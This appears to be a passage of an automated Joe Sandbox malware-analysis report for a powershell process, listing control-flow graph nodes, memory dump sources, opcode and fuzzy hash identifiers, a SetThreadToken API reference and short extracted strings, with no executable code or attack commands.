                                                                  control_flow_graph 4287 797452f-797453e 4288 7974547-797454e 4287->4288 4289 7974540-7974546 4287->4289 4290 797454f-7974568 4288->4290 4289->4288 4289->4290 4292 797456e-7974573 4290->4292 4293 7974c1d-7974c2b 4290->4293 4294 7974575-797457b 4292->4294 4295 797458b-7974592 4292->4295 4296 797457f-7974589 4294->4296 4297 797457d 4294->4297 4295->4293 4298 7974598-797459d 4295->4298 4296->4295 4297->4295 4300 79745b5-79745bc 4298->4300 4301 797459f-79745a5 4298->4301 4300->4293 4305 79745c2-79745c7 4300->4305 4303 79745a7 4301->4303 4304 79745a9-79745b3 4301->4304 4303->4300 4304->4300 4306 79745df 4305->4306 4307 79745c9-79745cf 4305->4307 4311 79745e2-79745ec 4306->4311 4309 79745d3-79745dd 4307->4309 4310 79745d1 4307->4310 4309->4306 4310->4306 4311->4293 4312 79745f2-79745f7 4311->4312 4314 797460f-797462d 4312->4314 4315 79745f9-79745ff 4312->4315 4316 797462f-7974658 4314->4316 4317 797465b-7974665 4314->4317 4318 7974603-797460d 4315->4318 4319 7974601 4315->4319 4316->4317 4317->4293 4320 797466b-7974670 4317->4320 4318->4314 4319->4314 4323 7974672-7974678 4320->4323 4324 7974688-79746af 4320->4324 4325 797467c-7974686 4323->4325 4326 797467a 4323->4326 4330 79746b9-79746cd 4324->4330 4325->4324 4326->4324 4414 79746d0 call 7973e00 4330->4414 4415 79746d0 call 7973deb 4330->4415 4331 79746d2-79746e2 4333 7974c02-7974c0e 4331->4333 4334 79746e8-7974708 4331->4334 4337 797470b-7974711 4334->4337 4338 7974713 4337->4338 4339 797471a-7974735 4337->4339 4338->4339 4340 79748df-79748fa 4338->4340 4341 797499c-79749b7 4338->4341 4342 7974737-7974756 4339->4342 4343 797475e-7974768 4339->4343 4346 7974923-7974941 4340->4346 4347 79748fc-797491b 4340->4347 4348 79749e0-79749ea 4341->4348 4349 79749b9-79749d8 4341->4349 4342->4343 4344 797476e-7974773 4343->4344 4345 7974ada-7974b0b 4343->4345 4350 7974775-797477b 4344->4350 4351 797478b-797479a 4344->4351 4345->4337 4402 7974b10 4345->4402 4365 7974943-7974949 4346->4365 4366 797495b-7974995 4346->4366 4347->4346 4348->4345 4352 79749f0-79749f5 4348->4352 4349->4348 4354 797477f-7974789 4350->4354 4355 797477d 4350->4355 4351->4345 4357 79747a0-79747a8 4351->4357 4360 79749f7-79749fd 4352->4360 4361 7974a0d-7974a1f 4352->4361 4354->4351 4355->4351 4363 79747c0-79747f1 4357->4363 4364 79747aa-79747b0 4357->4364 4367 7974a01-7974a0b 4360->4367 4368 79749ff 4360->4368 4361->4345 4369 7974a25-7974a2c 4361->4369 4363->4345 4386 79747f7-79747fe 4363->4386 4371 79747b4-79747be 4364->4371 4372 79747b2 4364->4372 4374 797494d-7974959 4365->4374 4375 797494b 4365->4375 4366->4341 4367->4361 4368->4361 4376 7974a44-7974ad8 4369->4376 4377 7974a2e-7974a34 4369->4377 4371->4363 4372->4363 4374->4366 4375->4366 4376->4402 4381 7974a36 4377->4381 4382 7974a38-7974a42 4377->4382 4381->4376 4382->4376 4388 7974816-797487d 4386->4388 4389 7974800-7974806 4386->4389 4406 7974882-797488b 4388->4406 4394 797480a-7974814 4389->4394 4395 7974808 4389->4395 4394->4388 4395->4388 4402->4311 4408 7974890-79748d8 4406->4408 4408->4340 4414->4331 4415->4331
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq
                                                                  • API String ID: 0-1552367303
                                                                  • Opcode ID: ca05e7e58478b80d32ddad20932979d8a9e4cd4cef16b5571f62901a93fb619d
                                                                  • Instruction ID: e882f1f38fe1d9b5b0af5a880bda5e5e8696fc7363d4fb4ab268a7fbc1ea0da4
                                                                  • Opcode Fuzzy Hash: ca05e7e58478b80d32ddad20932979d8a9e4cd4cef16b5571f62901a93fb619d
                                                                  • Instruction Fuzzy Hash: 64F168B0B00245AFDB14CF58D540FA9BBB6EB89318F14C0A9E9059F366C772ED41CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4416 4ae72a0-4ae72ae 4417 4ae72dc-4ae72fb 4416->4417 4418 4ae72b0-4ae72b4 4416->4418 4418->4417 4419 4ae72b6-4ae72c7 4418->4419 4423 4ae72fc-4ae733b 4419->4423 4424 4ae72c9-4ae72db 4419->4424 4428 4ae73bf-4ae73c8 4423->4428 4429 4ae7341-4ae7348 4423->4429 4431 4ae73ca-4ae73d1 4428->4431 4432 4ae73d2-4ae744d call 4ae77f9 4428->4432 4429->4428 4430 4ae734a-4ae73be 4429->4430 4441 4ae7775-4ae778a 4432->4441 4442 4ae7453-4ae746f 4432->4442 4453 4ae778b 4441->4453 4445 4ae74f9-4ae7500 4442->4445 4446 4ae7475-4ae7484 4442->4446 4447 4ae75ce-4ae75d7 4445->4447 4448 4ae7506-4ae75b1 4445->4448 4446->4445 4454 4ae7486-4ae74f4 4446->4454 4450 4ae75dd-4ae75ea 4447->4450 4451 4ae7764-4ae776f 4447->4451 4448->4447 4467 4ae75b3-4ae75c8 4448->4467 4456 4ae75ec 4450->4456 4457 4ae75f4-4ae7603 4450->4457 4451->4441 4451->4442 4453->4453 4454->4451 4460 4ae75ee-4ae75f2 4456->4460 4461 4ae7618-4ae76c4 4456->4461 4462 4ae760b-4ae7616 4457->4462 4463 4ae7605 4457->4463 4460->4457 4460->4461 4473 4ae76c6-4ae76d0 4461->4473 4474 4ae7724-4ae7726 4461->4474 4462->4461 4463->4461 4465 4ae7607-4ae7609 4463->4465 4465->4461 4465->4462 4467->4447 4467->4451 4473->4474 4480 4ae76d2-4ae76ea 4473->4480 4474->4451 4475 4ae7728-4ae7732 4474->4475 4475->4451 4481 4ae7734-4ae773b 4475->4481 4488 4ae76ec-4ae76f0 4480->4488 4489 4ae7711-4ae771c 4480->4489 4482 4ae774d-4ae7753 4481->4482 4483 4ae773d 4481->4483 4482->4451 4487 4ae7755 4482->4487 4483->4450 4486 4ae7743-4ae7747 4483->4486 4486->4450 4486->4482 4487->4450 4490 4ae775b-4ae775e 4487->4490 4488->4489 4492 4ae76f2-4ae7706 4488->4492 4489->4474 4490->4450 4490->4451 4496 4ae770f 4492->4496 4496->4474
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \
                                                                  • API String ID: 0-2967466578
                                                                  • Opcode ID: eab853e6cd4a8d3cf459fb44aa162205bbf77cc4971aa0e068450a9a942d0307
                                                                  • Instruction ID: 828fb45d08b4ccdb296a0e8dd16fd3f5d38fa9dbd89dc6b2db110f0d197c1ef6
                                                                  • Opcode Fuzzy Hash: eab853e6cd4a8d3cf459fb44aa162205bbf77cc4971aa0e068450a9a942d0307
                                                                  • Instruction Fuzzy Hash: 0EC1AC39A00208CFCB14DFA5D944AADBBB2FF89300F158559E416AF265DB34ED89CB90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4498 77fc518-77fc55b 4500 77fc563-77fc58f SetThreadToken 4498->4500 4501 77fc598-77fc5b5 4500->4501 4502 77fc591-77fc597 4500->4502 4502->4501
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647670841.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_77f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3254676861-0
                                                                  • Opcode ID: 71959c34ed2034e36766ff5ad4a86b094f86837b0dda3f922e4c24397dc20210
                                                                  • Instruction ID: 9efc7d5d922d19467c736d8c896ff66dd4e80930054c7d33147376aa17739eaf
                                                                  • Opcode Fuzzy Hash: 71959c34ed2034e36766ff5ad4a86b094f86837b0dda3f922e4c24397dc20210
                                                                  • Instruction Fuzzy Hash: 621128B59003498FDB10DFA9D9847AEFBF8EF48320F24855AD568A7350C774A944CFA1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647670841.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_77f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3254676861-0
                                                                  • Opcode ID: 92eaa9170be2c126aaf80e62f2a7884bea26dd882d5a5a3d8bb171485579fb93
                                                                  • Instruction ID: 1c5a8aaf561bd7ae05518e4ae6fc30742d154cd16ff76b471b8020f60afcde0c
                                                                  • Opcode Fuzzy Hash: 92eaa9170be2c126aaf80e62f2a7884bea26dd882d5a5a3d8bb171485579fb93
                                                                  • Instruction Fuzzy Hash: 591106B59003498FDB10DF9AC984B9EFFF8EB88324F24845AD518A7350C774A944CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl
                                                                  • API String ID: 0-2992701587
                                                                  • Opcode ID: 4587e3edd95a24dfca7a0565ffb00e00e908bd392401b547a6b119b27d8d1948
                                                                  • Instruction ID: 787b3d4409ae201441f68312c38d9727ee9af86d6f667eaa370546b1d86d06be
                                                                  • Opcode Fuzzy Hash: 4587e3edd95a24dfca7a0565ffb00e00e908bd392401b547a6b119b27d8d1948
                                                                  • Instruction Fuzzy Hash: 89816E74A04204DFCB14CF54C691E9ABBB2AF8A394F2AC169E915AB351C732ED41CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl
                                                                  • API String ID: 0-2992701587
                                                                  • Opcode ID: 343f8b729b8a3797df5cd5e18c083521a3f9699b680536153b1e459e146d5767
                                                                  • Instruction ID: 84ab8ca07b3f19831e27a2cce3a4c4b3c71d27db09ac9555db6ce1df5a43cadd
                                                                  • Opcode Fuzzy Hash: 343f8b729b8a3797df5cd5e18c083521a3f9699b680536153b1e459e146d5767
                                                                  • Instruction Fuzzy Hash: 17816D74A04204DFCB14CF54C691E9ABBF2AF8A394F2AC169E915AB351C732ED41CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x.jk
                                                                  • API String ID: 0-4167960440
                                                                  • Opcode ID: 6902ad6b6e75ccee105179a8b048c433fc22e566c915893f1ed6e20f7c4f8598
                                                                  • Instruction ID: 9ca804dca8721f0c118da1407e6b07a7923d548ebb1e8cabcdf7b43d8b4f267b
                                                                  • Opcode Fuzzy Hash: 6902ad6b6e75ccee105179a8b048c433fc22e566c915893f1ed6e20f7c4f8598
                                                                  • Instruction Fuzzy Hash: 8C31F2B4B00204AFDB14AB68D911FAE7AB3EF84354F10C424EA026F795CF75AD41CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c72a45700042cbbf83bc3df81ba26f1069c2e0c69edd75b64bb93ecc320456d
                                                                  • Instruction ID: 1bd4d3cfe145b470b143d49e7c2069796fbd8528fedbee12e8338461658e51a3
                                                                  • Opcode Fuzzy Hash: 5c72a45700042cbbf83bc3df81ba26f1069c2e0c69edd75b64bb93ecc320456d
                                                                  • Instruction Fuzzy Hash: 6BD11674A01208DFCB05CFA9D584AAEBBF2EF88310F25C159E815AB361C775ED81CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48ca581f8c35375455279a51141d0b91b54cabe12e0ea4935cd070380cf25b9b
                                                                  • Instruction ID: aeef1442395a190b30c980ce3d636decc5e7b43b86918a8dd581277e297c0cdc
                                                                  • Opcode Fuzzy Hash: 48ca581f8c35375455279a51141d0b91b54cabe12e0ea4935cd070380cf25b9b
                                                                  • Instruction Fuzzy Hash: 6A919C70A002458FCB05CF5AC4D4ABEBBB5FF89310B28859AD4659B3A1C735FC81CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16c13fd8ac153c33f4fc432b378d44c42e95df91238ab22527af9f75e2ff0098
                                                                  • Instruction ID: 35bcff6f1529d5ea5b2782c6dcf48085d0bc19f056b14752330dabc787151b07
                                                                  • Opcode Fuzzy Hash: 16c13fd8ac153c33f4fc432b378d44c42e95df91238ab22527af9f75e2ff0098
                                                                  • Instruction Fuzzy Hash: 3A71A070A00248CFCB15DF69C884AAEFBF2FF89314F158969D4299B251DB71AC46CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5a4b9c51fb2262e749e713361512a28377e07e5571625dfaa4f296c8d2f40d7
                                                                  • Instruction ID: 931f15284ef544a9fc79f71d35d6d33ba32ddf904c4d15740ed2b6e224ba560d
                                                                  • Opcode Fuzzy Hash: a5a4b9c51fb2262e749e713361512a28377e07e5571625dfaa4f296c8d2f40d7
                                                                  • Instruction Fuzzy Hash: 52713D74A00208DFDB18DFA5D484BADBBF2FF88304F148529D422AB764DB74AD86CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a93381db32b0d923ae865feb771bdb85e096b42dfe829ee3ec42c06b243ff94
                                                                  • Instruction ID: 5f91eca7d582ee5e23082d47fa68825d02f3a36b1f9d27c84fe8b1886c1e4fcf
                                                                  • Opcode Fuzzy Hash: 7a93381db32b0d923ae865feb771bdb85e096b42dfe829ee3ec42c06b243ff94
                                                                  • Instruction Fuzzy Hash: DD41B3387002449FDB09DB79C8507AEBFF2EFC9310F28846AD815AB7A5DB749C458B60
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2710f1af753e8256a474fd1f233bada270c836b40fb241b88938de710bbc508f
                                                                  • Instruction ID: 6ecfde1f81cd75dee1ab22fbb9cd2dff3d546f728b636ad2bcbf0da7a5237c5e
                                                                  • Opcode Fuzzy Hash: 2710f1af753e8256a474fd1f233bada270c836b40fb241b88938de710bbc508f
                                                                  • Instruction Fuzzy Hash: 84416D74A00208DFDB14DFA9C8447ADBBF2BF89340F15856DD016AB355DB71AD45CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8964620e370f30e89939fc94638e3e45d575dc3b75e2358a20b458277c92d28e
                                                                  • Instruction ID: 38578e2c1ee3a9418b1815c3cadced557154ff41f2032325d73c5ea0a066e727
                                                                  • Opcode Fuzzy Hash: 8964620e370f30e89939fc94638e3e45d575dc3b75e2358a20b458277c92d28e
                                                                  • Instruction Fuzzy Hash: 9D4153386002049FDB09DF79C4557AEBBF3EF88310F148469D815AB795DB71EC418B60
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d5ac1158edf7e8beeeb1dd7560a58b2f3eceb4ac35123d4909a4c5a4759b106b
                                                                  • Instruction ID: f2983da0a2afc6ffcc13491eee91de041cda66bf126d3c5f8375edc7712f7625
                                                                  • Opcode Fuzzy Hash: d5ac1158edf7e8beeeb1dd7560a58b2f3eceb4ac35123d4909a4c5a4759b106b
                                                                  • Instruction Fuzzy Hash: 9E411675A005098FCB05CF9AC4D4ABAFBB5FF48314B298599D955AB364C732FC90CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: acca3dc872e42b2297ab4c510e28ab77a9b71f06fd36ce54ad5a641017f434a1
                                                                  • Instruction ID: 35608c6ef17364457b2c6a67168ac9b41f07c7c94d371a9c88c60e23f933993f
                                                                  • Opcode Fuzzy Hash: acca3dc872e42b2297ab4c510e28ab77a9b71f06fd36ce54ad5a641017f434a1
                                                                  • Instruction Fuzzy Hash: 9F3146F2B101218BCB155768A91266EB773EFD5758F10C4BACA019F742CA729D01C3E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6549b699be6bed0d2a31aa1578b9e115a6407e5cfbea9561928ba3ebb0cd8eca
                                                                  • Instruction ID: 3c58b9b7a9686650d23694fe9768a3062495d84d0ef07a030264b0950970468d
                                                                  • Opcode Fuzzy Hash: 6549b699be6bed0d2a31aa1578b9e115a6407e5cfbea9561928ba3ebb0cd8eca
                                                                  • Instruction Fuzzy Hash: 0B319DF27102038FCB256A746816ABAB7A28FC2318F148476D502CB681DF39D945C3E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a18aec9bacf0ce5be8013c5a984b4e2d539008f22771ec122d2b3e0f5e132d91
                                                                  • Instruction ID: c4fe11152a1d73ed7954b526cd6ee8f96bab8cd11dd86fa67533152d51fd2651
                                                                  • Opcode Fuzzy Hash: a18aec9bacf0ce5be8013c5a984b4e2d539008f22771ec122d2b3e0f5e132d91
                                                                  • Instruction Fuzzy Hash: C8214F74A093898FCB01CFA9D4909AEBFB1FF4A310B19459AD495DB352C334EC45CB61
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2633753911.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a2ab60378c32f95d8acf281c189d47b2286db06bcdaf2a42cbcf8e10c9c760b1
                                                                  • Instruction ID: e2eb39612480f5d0feac4151ce1139c98f7b39d2da12bb7c69f5c29457a88b70
                                                                  • Opcode Fuzzy Hash: a2ab60378c32f95d8acf281c189d47b2286db06bcdaf2a42cbcf8e10c9c760b1
                                                                  • Instruction Fuzzy Hash: 59F0E97AB082848FC705CB58DC607A8BBB4EF86328F1941D7C555DB1D3C726AC16CB51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$4'eq$4'eq$4'eq$4'eq$tLkk$tLkk$x.jk$-jk
                                                                  • API String ID: 0-2395269777
                                                                  • Opcode ID: 280b0b96a5a2944fdc8869d3e00448a76f54ced37cc1df6873aa26bd874ec521
                                                                  • Instruction ID: 7e9011d3068ed611b0f4db896f26d2287fb03488f657ecd04c777e35d189c8f6
                                                                  • Opcode Fuzzy Hash: 280b0b96a5a2944fdc8869d3e00448a76f54ced37cc1df6873aa26bd874ec521
                                                                  • Instruction Fuzzy Hash: 6A2250B4A012189FDB24DF64C951BEEB7B2FF89304F1085A9D5096B791CB31AE81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$84wl$84wl$d%kq$d%kq$d%kq$d%kq$tPeq$tPeq$$eq
                                                                  • API String ID: 0-2893271134
                                                                  • Opcode ID: 25003e4cb3ad21b9b990817a0d2fa0f0f2e437533947bfc0ec5af40fd8de8faf
                                                                  • Instruction ID: a7b0260a448aab2402cb89828a0677e04ce67f82768cbf5a63fc3a88681175df
                                                                  • Opcode Fuzzy Hash: 25003e4cb3ad21b9b990817a0d2fa0f0f2e437533947bfc0ec5af40fd8de8faf
                                                                  • Instruction Fuzzy Hash: 4C71F1F1B10216DFCF25CF68C81167ABBA7AF85359F248469E801AB391DB31DD42C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$tPeq$tPeq$#ik$$eq$$eq$$eq$ol$ol
                                                                  • API String ID: 0-2434364820
                                                                  • Opcode ID: 107adada56ba715827747ed1e1b6328c805425dddd6a051234eb81a5797ee8dd
                                                                  • Instruction ID: fb17d6b1fe6842a371c56cf7dc74be650aeb5c7ee24b42ca4a0e9dd97e394451
                                                                  • Opcode Fuzzy Hash: 107adada56ba715827747ed1e1b6328c805425dddd6a051234eb81a5797ee8dd
                                                                  • Instruction Fuzzy Hash: E4A156B27043168FDB258A7D981177BBBAAEFC2218F18847BD545CB292DB31CD41C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$84wl$84wl$TQjq$TQjq$tPeq$tPeq$$eq$$eq
                                                                  • API String ID: 0-2719618241
                                                                  • Opcode ID: e15c3113a9402748729114a83b3db60903a380acf98f3aecf37b340214f24aa4
                                                                  • Instruction ID: 273fb8ce04a92282e22bf18626a55bcc2411da13a807f685c3351eaa2513f9ee
                                                                  • Opcode Fuzzy Hash: e15c3113a9402748729114a83b3db60903a380acf98f3aecf37b340214f24aa4
                                                                  • Instruction Fuzzy Hash: 0E41AFB1600609DFCF25DF58C4006AA7BA3BF89754F658499E801AF395CB71DD42CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84wl$84wl$84wl$84wl$tPeq$tPeq$$eq$$eq$$eq
                                                                  • API String ID: 0-4175486713
                                                                  • Opcode ID: 3551bf6eae6bfec0737f9b0cda72d74b8f8a690c7074a149c39787d176884b6e
                                                                  • Instruction ID: 99aa30c906901f0febb5cdea286132dbea6435e89654c0f032e06a28204237b8
                                                                  • Opcode Fuzzy Hash: 3551bf6eae6bfec0737f9b0cda72d74b8f8a690c7074a149c39787d176884b6e
                                                                  • Instruction Fuzzy Hash: C9D1D875B002089FCB15DF58C461A6FBBA2EF88390F24846AFA159F391DB71DD41CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84wl$84wl$XRjq$XRjq$XRjq$tPeq$tPeq$$eq
                                                                  • API String ID: 0-4106212750
                                                                  • Opcode ID: e08808682cf2c02acda90f78d050a3bcbd0f274958daf39b6a0bb0e4f9cd6bab
                                                                  • Instruction ID: 5a07e739bb0457e8bb5b9aff349749898ed9605445a2e28ab896ddf747884a9d
                                                                  • Opcode Fuzzy Hash: e08808682cf2c02acda90f78d050a3bcbd0f274958daf39b6a0bb0e4f9cd6bab
                                                                  • Instruction Fuzzy Hash: EA61D731B00104DFCF259F689625A7ABBB2AF89310F14C069EA159F397CB75DD41CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tPeq$tPeq$$eq$$eq$$eq$$eq$ol$ol
                                                                  • API String ID: 0-1839052444
                                                                  • Opcode ID: add4a91dabe9c197385f234be8ffd4f4ea7fb49f909a711834c0b8f7659d5fb6
                                                                  • Instruction ID: 592222b2869559f53e2ad1f9f4842b9559b26244be899a3b8ae9b4f10653a325
                                                                  • Opcode Fuzzy Hash: add4a91dabe9c197385f234be8ffd4f4ea7fb49f909a711834c0b8f7659d5fb6
                                                                  • Instruction Fuzzy Hash: 40517BB275434D9FDB354A6D8801B7BBBBAAFC2714F18C46BE506CB291DA71C840C3A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$4'eq$4'eq$$eq$$eq
                                                                  • API String ID: 0-2296023852
